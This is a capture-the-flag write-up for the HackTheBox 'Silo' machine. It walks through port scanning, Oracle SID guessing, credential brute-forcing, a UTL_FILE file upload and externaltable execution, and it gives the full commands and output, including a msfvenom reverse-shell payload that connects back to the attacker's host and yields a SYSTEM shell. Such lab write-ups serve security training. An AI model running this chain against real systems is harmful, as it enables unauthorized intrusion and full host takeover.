Skip to main content

HackTheBox Silo

Edwin Tok | Shiro
Author
Edwin Tok | Shiro
「 ✦ OwO ✦ 」
Table of Contents

IP Address: 10.10.10.82

Key Exploitation Techniques:

  • Oracle TNS listener enumeration (SID guessing)
  • Oracle account brute-forcing
  • Oracle UTL_FILE package abuse for file upload
  • Oracle EXTERNALTABLE for command execution

Enumeration
#

$ nmap -sC -sV -A -p- 10.10.10.82

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp  open  http         Oracle XML DB Enterprise Edition httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=XDB
|_http-title: 400 Bad Request
|_http-server-header: Oracle XML DB/Oracle Database
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC

Scan identified IIS on port 80, SMB services, and crucially, an Oracle TNS listener on port 1521 and an Oracle XML DB HTTPD on port 8080.

website

A quick gobuster scan on port 80 yielded no interesting web content beyond /aspnet_client.

$ gobuster dir -u http://10.10.10.82 -w /usr/share/wordlists/dirb/common.txt -t 50 
...
/aspnet_client        (Status: 301) [Size: 156] [--> http://10.10.10.82/aspnet_client/]
...

The focus shifted to the Oracle services.

Exploitation
#

Oracle Enumeration & RCE (SYSTEM)
#

The Oracle Database Attack Tool (odat) was used to enumerate the Oracle TNS listener. First, sidguesser identified valid SIDs.

$ odat sidguesser -s 10.10.10.82

[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...
...
[+] SIDs found on the 10.10.10.82:1521 server: XE

The valid SID XE was found. Next, passwordguesser was used to brute-force credentials for this SID.

$ odat passwordguesser -s 10.10.10.82 -d XE
...
[+] Valid credentials found: scott/tiger. Continue...
...
[+] Accounts found on 10.10.10.82:1521/sid:XE:
scott/tiger

The credentials scott/tiger were successfully identified.

A Windows reverse shell executable (exploit.exe) was generated using msfvenom.

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.6 LPORT=1234 -f exe > exploit.exe

odat’s utlfile module was then used to upload exploit.exe to the /temp directory on the remote server. Initial attempts failed due to insufficient privileges.

$ odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --putFile /temp exploit.exe /home/shiro/HackTheBox/Silo/exploit.exe

[1] (10.10.10.82:1521): Put the /home/shiro/HackTheBox/Silo/exploit.exe local file in the /temp folder like exploit.exe on the 10.10.10.82 server
[-] Impossible to put the /home/shiro/HackTheBox/Silo/exploit.exe file: `ORA-01031: insufficient privileges`

The --sysdba flag was added to odat to connect with SYSDBA privileges, which resolved the permission issue.

$ odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --putFile /temp exploit.exe /home/shiro/HackTheBox/Silo/exploit.exe --sysdba

[1] (10.10.10.82:1521): Put the /home/shiro/HackTheBox/Silo/exploit.exe local file in the /temp folder like exploit.exe on the 10.10.10.82 server
[+] The /home/shiro/HackTheBox/Silo/exploit.exe file was created on the /temp directory on the 10.10.10.82 server like the exploit.exe file

Finally, odat’s externaltable module was used to execute the uploaded exploit.exe. Set up a netcat listener to catch the shell.

# On attacker, set up Netcat listener
$ nc -nlvp 1234
listening on [any] 1234 ...

# Execute the uploaded binary
$ odat externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --exec /temp exploit.exe --sysdba

[1] (10.10.10.82:1521): Execute the exploit.exe command stored in the /temp path

# Reverse shell received
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.82] 49181
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
nt authority\system

Got a reverse shell as NT AUTHORITY\SYSTEM. The user.txt and root.txt flags were retrieved.

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>cd C:\Users
C:\Users>type C:\Users\Phineas\Desktop\user.txt
<redacted>

C:\Users>type C:\Users\Administrator\Desktop\root.txt
<redacted>

Related